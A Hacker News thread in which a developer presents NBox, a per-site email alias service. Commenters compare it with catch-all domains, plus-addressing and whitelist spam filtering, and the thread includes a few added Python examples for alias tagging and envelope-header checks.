Show HN: NBox – Sign up anywhere without giving your email address (notif.me)
286 points by bdav24 on June 20, 2017 | 204 comments



I've had a catch-all for *@mydomain.com forward to my primary email address for 10+ years. In that time I signed up for services and websites with [domain]@mydomain.com thinking I'd catch all those dirty scoundrels selling my email address and have an easy way to filter unwanted mail.

But you know what really happened? I wound up with hard to remember email logins and caught less than a handful of services sharing my email address without my permission.

It wasn't worth it.


I did that, too. Used a catch-all and just subbed to things with a new e-mail address, relying on the catch-all to put it all into one box.

Big mistake.

First off, I got FLOODED with e-mail bounce-back spam because spammers send e-mail with forged From: headers and I'd get all the errors.

Second, I discovered that nobody is actually selling my e-mail address except for one gaming forum I used years ago. Not even Facebook has sold my e-mail address.

Third, I've run into issues when replying to e-mails. I filed a support ticket with a company once, where the e-mail address I had registered with them was company@mydomain.com. They responded via e-mail, and when I replied to said e-mail, their ticket system rejected it since the From: address was my main address of myname@mydomain.com.

Now that I want to just switch to a single e-mail account with gmail, I find myself needing to try to find every e-mail address I've used @mydomain.com and changing them with the website. Meh...not worth it.


> Not even Facebook has sold my e-mail address.

Won't FB be among those least likely to sell your email address? FB has tons of ways to make money using your data. Your email address offers very low marginal utility over all the rest of your data.


FYI you've used marginal utility incorrectly in this context. I think it would be better to say a low return.

"thus the marginal utility of a good or service is the change in the utility from an increase in the consumption of that good or service." [1]

[1] - https://en.wikipedia.org/wiki/Marginal_utility


Facebook would rather BUY users' e-mail addresses in bulk.


You could have solved the second problem by storing the email with the login and password in a password manager. Maybe they were not a thing yet when you started this experiment.

The third problem is more serious. I use Thunderbird. I googled and there are a couple of addons that make it easy to edit the from address without having to create new Thunderbird identities.

https://github.com/absorb-it/Virtual-Identity

https://freeshell.de//~kaosmos/index-en.html#editsender

Both are somewhat unsafe, one because of the site certificate, the other because of the download site.

The first problem looks like a showstopper though.


Why do you need addons for it? Thunderbird allows changing the From address by default. ("customize address" in identity combobox)


I never noticed that, thanks. I googled and found it's been there since Thunderbird 45, April 12, 2016.


Yeah, I started this back in 2003. I imagine password managers existed back then, but they certainly weren't as common.

These days I don't even use Thunderbird. I just have gmail retrieve all my e-mail from my POP3 server. Though FWIW, I still have Thunderbird installed with all my e-mail going back to 2003. I imagine there's a way I could capture every e-mail address I've used then manually go to each web site and change my registered e-mail address.



Hi Sohcahtoa82, selling might not happen that often (fortunately), but data leaks happen very often (see http://breachlevelindex.com/ for example)


This is exactly what I do, and it's worked beautifully for me. (domainname)@mydomain.com is pretty standard/easy, and storing it in password manager makes it even easier.


Same here. Sometimes I'll also add the date when I entered the address in a form. For instance, the last time I registered to vote, I used YYYYMMDD-ca-voter-registration@mydomain.org. During the last election cycle, I caught a few California politicians harvesting my address and adding it to their email lists.


Ironically the CAN-SPAM Act only prevents commercial entities from doing this, however shady the practice may be. Political emails are protected free speech and AFAIK the means by which addresses are obtained is irrelevant.


Tangential question - I've been meaning to set this up - how are you hosting your own email domain? Fastmail/Gsuite/self-hosted?


Not the poster you replied to, but I use Fastmail.

If your Fastmail address is dfinniger@fastmail.com then you can randomly create emails like:

some-domain@dfinniger.fastmail.com

and it will automatically send them to your main email.

It's very convenient, and the cost per year is likely to be less than your hourly rate multiplied by the number of hours it'd take to set up self-hosting.


I use G Suite for one domain (because I was grandfathered into a free plan) and Zoho for others. IMAP is a little faster in Zoho, and I haven't seen a difference in reliability. The Google web interface is much better, though.


G-Suite in my case. I use service-specific emails and then remember them via autocomplete or a password manager.


Companies/organisations whose data leaks I have discovered through spam to single-use addresses:

  * monster.com
  * linkedin
  * Pragmatic Programmers (pragprog.com)
  * audioscrobbler (now part of last.fm)
  * The London Cycling Campaign
  * The Economist's subscription department


  * Dropbox
  * Adobe
  * ...
The list is long!


You need to discern between companies nefariously sharing your email without your permission and those that were the victim of hacks. Dropbox and Adobe were, of course, both thoroughly penetrated and the exfiltrated logins including email addresses are widely available.

These aren't small numbers, either. We're talking about 68 million logins for Dropbox and 150 million for Adobe. To put those huge numbers in perspective, combined that's over half the population of the USA.


"But you know what really happened? I wound up with hard to remember email logins and caught less than a handful of services sharing my email address without my permission."

Can you elaborate? I have been meaning to set up just such a mechanism as it has always seemed like a good idea ...

It seems like "rsync.net@example.com" would be very easy to remember and associate with the site (rsync.net, in this example) ...


I've been using the same system with my own domain for several years now, and unlike the OP, I've seen many unique emails get on to spammer lists. My blocklist of emails has got quite long!

As you say, using a password manager, or just picking a nameOfService@example.com style of email, means remembering the email addresses is pretty easy. n.b. you may need to also set up your email client to let you send emails with a customisable address too.

Spammers who send stuff to randomAddressTheyMadeUp@example.com can be mostly blocked because these tend to have a messy jumble of text and numbers - I use a simple regex to throw away these kinds of spam. I use procmail to do the blocking, but I'm sure there are many other tools that would work just as well.


Not sure what he meant, but that's the system I use and I've never forgotten a login yet.


I wish I could do this with my phone number.


I toyed with the idea of using a catch-all, but couldn't get around the problem of having to occasionally send mails from the address (e.g. for customer support, etc - as another commenter mentioned).

Recently I came up with another solution that I know some have used:

Stick to one email address and have a whitelist. Anything not in the whitelist is "spam" (including irritating LinkedIn emails, etc). If I get email from anyone not in the whitelist, they get sent an email with a website link asking them to confirm their identity by submitting their email address. Once they do that, they are whitelisted and all their quarantined emails show up in my inbox.

The only remaining part is constructing that whitelist. I wrote a script to go extract all the From addresses and just dumped them in there. So people who've emailed me in the past will not deal with going to the website to confirm their identity.

If I get email from an entity I no longer want to see in my inbox, I press a keystroke to remove them from the whitelist. Likewise, if I go to my quarantine folder and see an email I'd like to whitelist, it's done with a keystroke.

Been using it for less than a month, and it is quite effective so far.


> I toyed with the idea of using a catch-all, but couldn't get around the problem of having to occasionally send mails from the address (e.g. for customer support, etc - as another commenter mentioned).

You know, the sender header is just a text string... What stops you from putting whatever e-mail alias you registered with as sender, for those occasions?


>What stops you from putting whatever e-mail alias you registered with as sender, for those occasions?

Cognitive load. I don't want to:

1. Think about it.

2. Figure out which email address goes with which To: field.

3. Find a way to automate all this.

In the end, my solution would be less work to get rid of unwanted emails than using a catch-all. Why should I do the extra work in maintaining the system, when the sender can do the tiny amount of extra work instead? More fundamentally, why should anyone feel they have the right to just insert anything into my inbox? I should control the inbox - not them.


I too have had a catch-all @mydomain for around 10 years and it works beautifully for me. In addition to @mydomain I also have 2 email addresses. My main email that I give directly to places I trust like my bank and the second one I direct all my @mydomain email to. This way I only have to remember 2 email addresses, no matter how many @mydomain email addresses I have created (many hundreds by now).

By default I only ever receive a limited number of emails from any new emailx@mydomain, unless I explicitly go to @mydomain and allow a specific emailx@mydomain to pass that limit.

My only irritation is that some vendors block @mydomain as a valid email address, in which case I use an ancient email address in its place. Needless to say that vendor will never see my main email.


On the other hand, having a unique address for each site means they can't readily correlate your identity when selling information about users. (They're not gonna special-case your catch-all.)


Just make sure your catchall is renewed well into the next five years. Heck, you can do a 'rollover renewal' that lasts 10 years if you wanted.

This is to stop somebody eventually gaining control of the domain when it expires, setting up a catchall on it, and then being able to login to every single account you used with that address.

Some registrars protect a domain after expiration so nobody can hijack it and claim it as their own, but you often have to pay extra for this service.


It was worth it until the large hack attacks which stole the database of one of the mailing list companies (forgot name) -- then spam started pouring in on many, many legitimate addresses...

The only downside is when a company merges or renames: if it merged I end up with two accounts which have half of the history; if it renames -- hard to remember the original email (recent example: wayfair's old name was something else).

Now, I'm switching to a single email -- it's just simpler.


I do not use catch-all addresses, but use a version of [domain]@mydomain.com by adding new email addresses (aliases) in an automated way. I "remember" the used email addresses in two ways: 1) my mail server configuration contains a list of all aliases created in the past, 2) my password manager saves logins on top of that. The nice side effect is that you keep track of all the sites you have ever created logins at.


Fastmail has an elegant solution for this called subdomain addressing. For example, let's say your email address is joe@fastmail.com. You can use amazon@joe.fastmail.com or facebook@joe.fastmail.com, spotify@joe.fastmail.com, etc...

https://www.fastmail.com/help/receive/addressing.html


The username and password are saved in my password manager, so it's no hassle at all.


I do the same, except I also add some diceware words, to make the address harder to guess, and so I can update to a new address on leak.

I store it in a password manager, so remembering the address is no problem.


Sub-addressing is an easier way to do that.

If you use a "regular" character like "." as a separator virtually all sites will accept the email as valid vs using something like "+".


I always loved gmail for this. Still, I'd also love it in my private email. How can I set this up?


Highly dependent on the setup you have.


It's also a nightmare if/when you sell your domain, because you have to go clean up all those accounts. You can get one email forwarded by the new owner, but N is a no-go.


You are not solving the privacy problem. You can be easily identified by your custom domain, unless there're a couple thousand people using it.


That depends on your definition of "solution". The scheme protects you (to a certain degree) from automated creation of inter-site profiles. The reason is, only very few people employ (a variant of) this strategy, so trying to "deanonymize" is costly and usually not worth it economically.


> I wound up with hard to remember email logins

You could easily argue this is a symptom of a different problem.


With gmail you can do something similar without all that hassle. Let's say your email is johndoe@gmail.com: you can register any email as johndoe+whatever@gmail.com and Gmail will always ignore the + and route to your johndoe@gmail.com address.


I'm sure anyone selling their users' email addresses will know about this and strip out the + suffix from any gmail addresses in their list.


Some websites consider email addresses containing "+" as invalid.


Doesn't BCC render this solution mostly useless anyways?


The mail has to get to you somehow. The way SMTP works is that there are two places your email address is usually used during email delivery:

1. Before the actual sending of the mail data, the sending server connects to your mail server and after a polite introduction sends 'RCPT TO: xxxx@yyyy.com'. This is where your unique-for-that-site email address is used.

2. Later on during the transmission, all the 'real' mail headers are sent, and this is where the To, From, Subject, and CC headers are set. If you were BCC'd there is no 'BCC' header, so the 'To' header normally has the mail address of the original 'To' recipient. Or in a lot of cases the 'To' header is omitted entirely. Depending on your mail client, you will either see your name in the To field, or something like 'Undisclosed Recipients'.

Spammers typically shake it all up, so that the 'To' header rarely matches the 'RCPT TO:' value.

In my bespoke anti-spam system, I re-inject the 'RCPT TO:' and 'MAIL FROM:' into the mail headers (prefixed with X-) so I can easily see in my client what is actually going on.
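The envelope-versus-header split described in the comment above, as an added example that is not the commenter's code: it copies the SMTP envelope into `X-` headers and reports which alias the envelope recipient maps to and whether that address appears in To:/Cc: at all. The header names `X-Envelope-From`/`X-Envelope-To`, the alias table and every address are constructed assumptions.

```python
import email
import email.policy

# Constructed alias table: envelope recipient -> site the address was given to.
ALIASES = {
    "shop.example@mydomain.example": "shop.example",
    "forum.example@mydomain.example": "forum.example",
}

# Constructed sample of what arrives in DATA for a BCC'd bulk message.
# The To: header names someone else; only RCPT TO carried our alias.
RAW = (
    b"From: Deals <deals@bulk.example>\r\n"
    b"To: Other Person <other@elsewhere.example>\r\n"
    b"Subject: Weekly offers\r\n"
    b"\r\n"
    b"Hello\r\n"
)


def _clean(addr):
    """Refuse envelope values that could smuggle extra header lines."""
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in addr):
        raise ValueError("control character or space in envelope address")
    return addr


def header_recipients(msg):
    """Addresses a mail client would show, taken from To: and Cc:."""
    found = set()
    for name in ("To", "Cc"):
        for hdr in msg.get_all(name, []):
            found.update(a.addr_spec.lower() for a in hdr.addresses)
    return found


def annotate(raw, mail_from, rcpt_to):
    """Copy the SMTP envelope into X- headers and report what it reveals."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    rcpt = _clean(rcpt_to).lower()
    msg["X-Envelope-From"] = _clean(mail_from)
    msg["X-Envelope-To"] = rcpt
    report = {
        # Which site was handed this alias (None if it was never issued).
        "given_to": ALIASES.get(rcpt),
        # False means the alias only appeared in RCPT TO, as with BCC or spam.
        "in_headers": rcpt in header_recipients(msg),
    }
    return msg, report


if __name__ == "__main__":
    message, info = annotate(
        RAW, "bounce-77@bulk.example", "shop.example@mydomain.example"
    )
    print(message.as_string())
    print(info)
```
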


lol. I have nico+domainname@domain.com, it's a standard alias used by google apps to forward to nico@domain.com

It's worth it and only 1 password


I'd think spammers would have caught on to that and would either start sending e-mail to nico@domain.com or nico+someotherdomainname@domain.com


You think spammers are people going through emails? It is all automated.


    s/+.*@/@/g


I don't think that would work, something like /(.)\+.(@.\..)/g might


Well obviously it's automated. I didn't mean manually finding name+domain@mydomain.com e-mail addresses and manually editing them to just name@mydomain.com.


I also use the respective domainname but instead of my given name I generate a short random sequence with pwgen.


I think this is a good idea, but pretty poorly executed again.

Another user commented that you could just register your own domain and do this; that's great for the average hacker news reader, but not so great for the average Joe so a service like this (if done correctly) would be pretty convenient.

Things that jump out right away as bad about this NBox.

1) It just auto generates an email for me. That's going to be a pain in the ass to remember.

2) Wait; how do I login? I literally don't understand how to login to this app short of going to the site and I get auto logged in by the Chrome extension?

3) Why do I even need a Chrome extension to get my email; where is the password protection so I can login from a different device or god forbid my computer crashes?

4) Not every service asking for an email address is a web service. If I sit down for dinner at an Applebees and order a meal a server is going to tell me the appetizer is free if I just provide my email address... and I want that free appetizer minus the side of spam...

As someone else noted mailhero.io is basically the same service as this, but its big flaw is that the real email address is exposed since it's always included in the provided email address.

spam.u.later@mailhero.io (ah; real address is later@mailhero.io) Also; many other email services (including GMail) can do the same thing as mailhero using + addressing and adding rules.


Hi bigtunacan, thanks for your feedback.

1) "That's going to be a pain in the ass to remember": the extensions are there so you don't have to.

2) "how do I login?": we're currently developing this side of the service.

3) See 2)

4) We're planning on proposing mobile apps too.

To put it into context, nBox is fairly new and we did not implement all our ideas before knowing if people were gonna be interested.


Understood; and I'm not being a hater. I'm just trying to provide some useful feedback after checking out your service.

In regards to the extension though; that's just such a bad direction to go IMHO. Most email is being read on phones these days anyway; does NBox even work from a phone today?


No harm taken, the service is not perfect yet and it lacks a lot of functionalities, that we can agree on.

It works on android phones with chrome, but like you said I wouldn't remember the generated addresses, so we think the extension is a big part of the service, and unfortunately, extensions are not available on mobile. We're working on the subject to find the best solution possible.


The service is fine as-is. It sounds like a perfect complement for a password manager like LastPass or 1Password. All the points brought up are addressed by the password manager: sync across multiple devices, use multiple browsers, etc.

A password manager generates random data for the password textbox. Your extension generates random data for the email textbox. Perfect!


I was thinking the same thing! Come back to me when it integrates with LastPass


That's the thing, it doesn't need to. Nbox fills the email text box with something random, and LastPass or 1Password takes it from there. It generates a password for you and asks you to save the login info for future use.


Hi heliodor, thanks for the support! :)


I've been wanting something like this for awhile to combine with my LastPass use. Now I can have different email addresses and passwords for everything.


Agree with all your points except your last. Many websites and services will disallow email addresses with + in them (and they're normally the ones I don't trust, like insurance comparison ones)


If you are running your own mail server (the open web is not yet dead) you can change the `recipient_delimiter` to another character. Mine is set up with a period. misc.ycombinator@domain.com


This is definitely a pro-tip! Using a dot instead is a great idea and much less likely to be "auto-removed" by a smart harvester that strips "+" extensions.


I agree that is an issue with those services, but that was sort of my point. Some websites are starting to catch on that people are doing this so they are starting to block + addressing the same way they block mailinator.

Somewhere in this issue of websites blocking + addresses there is some irony as + addressing is a more recent email standard and so some people have legitimate email addresses with + symbols in them; in fact last I knew Microsoft Exchange still wasn't supporting + addressing due to the need to support legacy users.


I say, their loss.


Yes good idea, I found maskme to be much better executed


Hi singularity2001, maskme (blur now) is a bit different. If they get hacked, spammers will get your email address and other information.


As an alternative, you could register a domain with a catch-all email address and simply register for new services on the fly using a unique string for each site. Have the catch-all forward to your main email account.

For example, I would sign-up for HN using hackernews@marak.com and for Reddit using reddit@marak.com

Simple and effective.


Been there done that. If you catch all e-mail you will also get a lot of spam to random addresses like say sven@marak.com, lollerskates95@marak.com and so on and so forth. So then you need spam filtering anyway, or you need to configure which addresses are valid.

I still host my own e-mail but I no longer do catch-all. There are only a few sites and services I care about. For those I have trusted them with my e-mail address. For all others I use 3rd-party throwaway mail services.

I get less spam now than I did with catch-all.


Or you can use hackernews.really@marak.com and reddit.really@marak.com and only forward *.really@marak.com.

I have learned to keep a personal e-mail address for friends & somewhat trusted people, but never businesses. Businesses (and all government offices, kids' school,...) get their one-time address. If spammers somehow get to it, it is much easier to cut them off, and I also know who leaked the address to them.

Of course, http://www.mailcatch.com/ rules for those one-time "no, I will not let you spam me" registrations.


I actually haven't gotten any spam through my catch-all emails. Hopefully it stays that way.

I use a completely different domain than the one that's publicly associated with me though. Maybe that helps.


If you host your own domain you'll likely need spam filtering for abuse@ or at least postmaster@ (or ignore RFCs, like most unfortunately do..).


I forward abuse@, security@, postmaster@, hostmaster@, webmaster@, info@ and dns-admin@ for my main domain, and actually mostly don't get any spam to any of them except from dns-admin@, which I have listed as contact in WHOIS for some of my domains.


What kind of accounts do you use throwaway mail services for? The use case where NBox would be useful for me is sites I don't use often, i.e. a clothing site or online video game store. But I wouldn't trust those to a throwaway email.


I used to do this. The amount of spam mail I received to mailbox names I had never used started to dwarf my actual email. This is apparently made worse because spammers take the fact that these addresses will receive mail as a signal that they're valid, causing them to send more mail to them.

A couple of years ago, maintaining the blacklist passed the point where this was a viable technique for me.


This is why you might consider maintaining a white list or white pattern instead.


A white pattern is an idea that I'd considered but never actually tried implementing.

It has the advantage of being able to spontaneously create email addresses when signing up for things, while still blackholing most guessed addresses.

I like this idea a lot.


Easier to use sub-/plus-addressing rather than maintaining a list.


That seems like a white pattern to me.


If only delivering mail to existing email addresses is a white pattern, sure.


I don't follow.

If I configure me.example.com to accept emails matching the pattern "me<anything>mail42@me.example.com", then I can generate as many on-the-fly unique emails as I want, without maintaining any lists, and without catch-all forwarding of random spam to my inbox.

If I use me+anything@me.example.com, I get the same exact feature, but the downside is "+anything" is recognized by some and either disallowed or used to generate more patterns.

If I use subdomains (like anything@me.example.com) I have the spam issue.

With a white pattern scheme, you can choose your own pattern (so sites can't really catch on), not have to maintain any lists, and avoid spray-and-pray spam.


If you do this, make sure you lock down your account at your domain registrar. A socially engineered DNS hijack could be all it takes to obtain full read/write access to your email.


Can you elaborate on the steps needed to ensure your security in this case?


Spend a decent chunk of money to become a registrar yourself or go with MarkMonitor.

I suppose google domains might be OK for personal email.


Would you mind elaborating? Do you mean socially tricking a GoDaddy or other domain registrar employee into changing DNS records?


The other thing that happens is spammers use your domain to spam others. That catch-all will work for systems that test email validity for the spammer's made-up address on the From line.


With gmail you can just do username+hackernews@gmail.com and it will send it to username@gmail.com. The nice thing about this service though is you can just remove the fake email and they can't email you anymore.


There are a fair number of sites with broken regexes/validations that reject emails with +s in them.


I have also observed emails tagged with "+" to break unsubscribe links in cases where the address is included in the link and the link is not properly URL-encoded.


RFC-violating email regexes cause problems less and less all the time, and much less often than just 5 years ago.


Gmail allows you to create unlimited unique addresses by using the + symbol. so you could do: username+trello@gmail.com. It's worked well for me for a few years.

The only downsides I see are that (very few) sites still complain about the perfectly legal + symbol and some sites / bots are probably starting to reverse engineer that since it still exposes your username. But so far, I've yet to have a single site or service expose my primary mail account, so it at least helps.

Finally: this is a fantastic hack for testing your own signup flows. :)


Hi toddmorey, yes a well-known trick ;) The downside is that the + part can be easily removed by spammers.


I have a personal Gmail account that I give to real life friends and real met-in-person humans who want to directly contact me. And then a web gmail where everything is labeled with a plus (if websites don't accept the plus, I use a series of periods in the first portion of the email to make it unique). Then, I forward all emails with whitelisted +whatever's from my web mail to my personal mail.


Not a Gmail specific thing. That's something you can do with email in general.


Not really, according to the spec the '+' can be interpreted as part of the email address. The approach gmail takes seems to have gained widespread adoption, but it's not mandated by the spec.

Believe I saw this on HN recently: http://haacked.com/archive/2007/08/21/i-knew-how-to-validate...


I believe it is Gmail specific. Cursory search reveals that sendmail does that too, but I don't think it is specified in RFC. Feel free to correct me if I'm wrong.


It's more Sendmail and Exim and others did it, and Gmail does it too - not the other way around;)

With qmail the "standard"[1] was username-alias@example.com, rather than username+alias@example.com. I rather prefer that - but then my (user)name(s) don't contain any hyphens.

Either way I think it looks better with system usernames - firstname.lastname@example.com was/is usually handled as a separate form of alias look-up anyway.

[1] http://www.lifewithqmail.org/lwq.html#dot-qmail-files See section "4.1.5. extension addresses"

[ed: and I recall using tmda as an anti-spam system - it inserts an encrypted tag in the alias portion, that can be stamped with an expiry date, and tied to a sender address (eg hmac(userkey, sender@example.com+01012018) => xyxyzzzzz - give sender@example.com the address user-xyxyzzzz@example.net - and mail to that address will be accepted from only sender@example.com until 1/1/2018).

http://tmda.sourceforge.net/cgi-bin/moin.cgi/AboutTmda ]
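A sketch of the sender-bound, expiring address idea from the comment above, as an added example; it is not TMDA's code or its actual address format. The `user-YYYYMMDD.<mac>@domain` layout, the 16-hex-character truncation, the key and the function names are all assumptions made for illustration.

```python
import hashlib
import hmac
from datetime import date, datetime

# Constructed demo values; a real key would be random and kept on the mail server.
KEY = b"constructed-demo-key-not-a-real-secret"
USER, DOMAIN = "user", "example.net"


def _tag(key, sender, expiry):
    """HMAC over the permitted sender and the expiry date, truncated."""
    data = f"{sender.lower()}|{expiry:%Y%m%d}".encode()
    return hmac.new(key, data, hashlib.sha256).hexdigest()[:16]


def make_address(key, sender, expiry, user=USER, domain=DOMAIN):
    """Address to hand to `sender`; usable through `expiry` inclusive."""
    return f"{user}-{expiry:%Y%m%d}.{_tag(key, sender, expiry)}@{domain}"


def check_recipient(key, rcpt_to, mail_from, today, user=USER, domain=DOMAIN):
    """Decide at RCPT TO time whether to accept mail for a tagged address."""
    local, _, dom = rcpt_to.rpartition("@")
    prefix = user + "-"
    if dom.lower() != domain or not local.startswith(prefix):
        return "reject: unknown recipient"
    stamp, _, mac = local[len(prefix):].partition(".")
    if len(stamp) != 8 or not (stamp.isascii() and stamp.isdigit()):
        return "reject: malformed tag"
    try:
        expiry = datetime.strptime(stamp, "%Y%m%d").date()
    except ValueError:
        return "reject: malformed tag"
    # The date in the address is covered by the MAC, so editing it to
    # extend the lifetime invalidates the tag. Compare in constant time.
    expected = _tag(key, mail_from, expiry)
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return "reject: bad tag or wrong sender"
    if today > expiry:
        return "reject: expired"
    return "accept"


if __name__ == "__main__":
    addr = make_address(KEY, "sender@example.com", date(2018, 1, 1))
    print(addr)
    print(check_recipient(KEY, addr, "sender@example.com", date(2017, 6, 20)))
    print(check_recipient(KEY, addr, "spammer@bulk.example", date(2017, 6, 20)))
    print(check_recipient(KEY, addr, "sender@example.com", date(2018, 1, 2)))
```

The check binds the address to the envelope sender, which SMTP does not authenticate, so it stops reuse of a leaked address by other senders but not by one who forges the original sender's MAIL FROM.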


I don't have a source to a RFC, but all emails I've ever used let me do this. Including multiple different hosting services with my own domains, and my current work which is MS Exchange.


But it's also more easily traceable to you.

With a service aggregating these, we see many users from NBox. Perhaps this is not a concern for your use case, but it seems a tradeoff worth considering.


> more easily traceable to you

Depends who is tracking you.

If I register some non-personally-identifiable domain "e.g.: bumblebutt.example" and use a WHOIS proxy, you can only be given up by a registrar... which usually means a warrant.

Still paranoid? Pay for the domain using bitcoin you got in exchange for cash/services (there are a lot of registrars that take bitcoin).


It's certainly more traceable from the perspective of metadata aggregation. If you were looking at the users from multiple sites, you could easily consider "*@bumblebutt.example" to be one person thus linking all accounts together.

The benefit of a public site is that you can't use the hostname as an identifier for a single person.


Yep. I do this and route my email through mailgun that allows me to set up rules for forwarding emails. Their free tier is pretty generous and works great for my needs. Also solves the problem of shoddy websites selling my email because I gave them a unique email address and can block all emails coming to that address easily, if needed.


I've been doing this for years. It's fascinating (and sometimes horrifying) which addresses end up on spam/scam lists. I used to inform companies when it happened, but they almost always go for plausible deniability with "spammers try random addresses at a domain sometimes, it must have been that".


Just a reminder that Adobe, LinkedIn and Dropbox have all been hacked/suffered data leaks - those aliases are the main source of my spam. The other is through mandatory public company registration in Norway that's consistently mined by some halfwits apparently selling stamps etc.


Hi Marak, you're right, this is an alternative. You'd have to implement the filtering of the addresses you don't want any more though.


that's great for the average hacker news reader, but not so great for the average Joe


Hi, I'm David, one of the developers of nBox.

nBox generates for you an email address for each site, for free.

- Effortlessly thanks to our browser extensions

- Addresses are anonymous and private

- Delete the addresses you don't want any more

- Be notified according to your preferences on each email

I'm looking to share the service. Any feedback is very welcome.

Thanks!


My hesitation in signing up for any of these unifying products is the potential lock in. If I start using your service and eventually have dozens of sites directed through you, what happens when the product disappears?

My question is therefore how do you plan to fund this indefinitely if it is "Just Free, Forever" and is unlimited? You say it is part of promoting your brand, but it looks like that brand (or at least the domain) has been around for less than a year, so not much history. If it isn't your company's main product, what is to stop you from deciding the costs of providing this becomes too expensive for the promotion it is giving you?


Hi slg, that's a valid concern, here is a copy-paste of an answer I wrote earlier:

I tried to answer it there: https://www.producthunt.com/posts/nbox/comments/483328


I guess that is a fair answer. Thanks for responding.


What's your plan when every site starts banning your addresses? I have to spend 15 minutes to find a new non-blacklisted temp-email service every time I want to use one.


Hi deft, that's a concern we have. Some services might block our addresses some day, but that would be a mistake because nBox is not a disposable email service.


You may allow people to use their own domain?


Hi ponytech, that's something we're thinking of proposing, but it probably won't come in a very near future.


Can you say something from the service perspective?

Why shouldn't a service flag you as malicious and refuse users with email from your domain?

What do you do to prevent mass account creation on the service?

Thanks!


Hi ecesena,

> Why shouldn't a service flag you as malicious and refuse users with email from your domain?

Some services might block our addresses some day, but that would be a mistake because nBox is not a disposable email service.

> What do you do to prevent mass account creation on the service?

If your question is in regard to services which might block us, I don't think they care about mass account creation, a few email addresses are enough to bypass limits on emails.


Thanks! The non-disposable is a good point.

As for my 2nd question it was related. Oftentimes spammers rely on tools like nbox to create a massive amount of accounts on services like Winterest, so Winterest has to flag your domain as potentially malicious.

I was wondering if you have any countermeasures to this problem, such as a rate limit on the number of accounts one can create per service. I'm sure Winterest would appreciate :)


You mean fraudsters trying to take advantage of account creation on Winterest?

For a given service we authorize only one address, but we haven't implemented a rate-limit yet.


Yes exactly, fraudsters exploiting your service to have as many emails as they need to create very many accounts on Winterest.

If you have 1 single email account per service that is fine.

I think you should call out these two aspects on your site, to show that you're increasing privacy for users, but also protecting services from being abused exploiting nbox. It should reduce the likelihood of being blacklisted.
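The policy discussed in this sub-thread (one address per service for each account, plus a cap on how fast an account can obtain new addresses), sketched as an added example. It is not nBox's code and not part of the thread; the class and exception names, the `alias.example.invalid` domain and the limits are all assumptions.

```python
import secrets
import time
from collections import defaultdict, deque
from urllib.parse import urlsplit

ALIAS_DOMAIN = "alias.example.invalid"  # placeholder domain (assumption)


class RateLimited(Exception):
    """Raised when an account asks for new aliases faster than allowed."""


class AliasIssuer:
    """One alias per (account, service), with a sliding-window cap on new ones."""

    def __init__(self, max_new=5, window_s=3600, clock=time.monotonic):
        self.max_new = max_new             # hypothetical limit: new aliases per window
        self.window_s = window_s
        self.clock = clock                 # injectable so the window can be tested
        self._aliases = {}                 # (account, service) -> alias
        self._issued = defaultdict(deque)  # account -> times of recent new aliases

    @staticmethod
    def service_key(site):
        """Reduce 'https://WWW.Example.com/signup' to 'example.com'."""
        host = urlsplit(site if "//" in site else "//" + site).hostname or ""
        host = host.rstrip(".")
        return host[4:] if host.startswith("www.") else host

    def alias_for(self, account, site):
        service = self.service_key(site)
        if not service:
            raise ValueError(f"no host name in {site!r}")
        key = (account, service)
        if key in self._aliases:
            return self._aliases[key]      # repeat request: same address, no quota used
        now = self.clock()
        recent = self._issued[account]
        while recent and now - recent[0] >= self.window_s:
            recent.popleft()               # forget issuances older than the window
        if len(recent) >= self.max_new:
            raise RateLimited(f"{account}: {self.max_new} new aliases per {self.window_s}s")
        recent.append(now)
        alias = f"{secrets.token_hex(8)}@{ALIAS_DOMAIN}"  # random, not derived from names
        self._aliases[key] = alias
        return alias
```

Keying on the host name means `a.example.com` and `b.example.com` count as two services, so a real deployment would reduce hosts to the registrable domain first. The per-account cap only deters bulk sign-ups if creating accounts on the alias service is itself rate limited.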


So how is this different from something like Mailinator.com? In my opinion, I can't see a use case in which I'd care enough to have my temporary email private. If I cared enough I'd just use my real email.


If I had to guess, requiring that each email address be tied to an individual person would allow NBox to stay off "temporary email address" blacklists. It's a privacy service essentially, not an anonymity service. Same reason why credit card masking services are legal, but Visa/MC/etc wouldn't allow a mass-shared CC number.


It will not keep NBox off blacklists. I've been using sneakemail for this for like fifteen years (and they do not offer a free service), and I've run into a number of sites that ban their domains anyway. Adafruit, for example, bans their domains.


But a throwaway Gmail account works the same, yes?


Gmail accounts sometimes require you to give a phone number in order to register a new account. Not to mention creating a new email address with this looks way easier than signing up for another Gmail account.


Hi alkonaut, yes it works the same, but it might end up piling up.


Hi jswny, jacobwg is right, the addresses are private (and anonymous because we don't ask any information).

I'd say the use case is to filter "semi-wanted" emails.


A link to the chrome extension on the landing page would be quite useful (Otherwise visitors need to go to the chrome web store and search for it...and some of them are too lazy to do it). But otherwise I really like the idea. I'll give it a try ;)

P.S. here's the link for the extension: https://chrome.google.com/webstore/detail/nbox-your-registra...


Hi ionelmarcu, yes that was our plan too (I shared before changing the account creation tunnel).


thanks ported it to Edge and Firefox https://github.com/Scrxtchy/nbox-everywhereElse


Hi tenryuu, you're right extensions can be ported more easily than before, thanks for your contribution!

The Firefox extension was following the validation process, it's now published: https://addons.mozilla.org/en-US/firefox/addon/nbox/


Why does it feel like I am the only one using plus sign (+) feature supported by SMTP standards?

http://www.faqs.org/faqs/mail/addressing/index.html

TL;DR - Most SMTP servers support delivering mail to addresses like foo+bar@email.com, in which case it will be received by foo@email.com. You can specify whatever string of alphanum chars you'd like after the plus sign.


I've hit enough sites that refuse to accept a + in email addresses that I gave up using it, on the basis that I couldn't remember whether or not I was using it, per site. Standard it may be, but so many sites have bad email address validation.


Hi kchr, no you're not the only one to use the plus sign. As already discussed in this feed, the + part can easily be removed by spammers.


+1

Sorry, couldn't resist. I got burned by this, I used it to sign up to a newsletter, and when I tried to unsubscribe, I kept putting in my actual email address with no results. Took me two weeks to think of checking the "to" field and realising I'd used a plus address


Normally I only read on HN, but you got me logging in, upvoting and commenting! Probably most people just don't know about the standard. (As it is probably with most standards).

Anyways, thanks for your hint.


How does it work? I mean how does it generate addresses that aren't blocked by services (like mailinator and similar throwaway email sites)? Does it use thousands of random domains?


Hi alkonaut, the domain is unique at the moment. Some services might block our addresses some day, but that would be a mistake because nBox is not a disposable email service.


Most of these new email services overlook a few very important details which guarantee that they will probably not be around in a year:

1. You need to have multiple domains. If your solution is just one host name and your service becomes popular, it will become blacklisted in a matter of months.

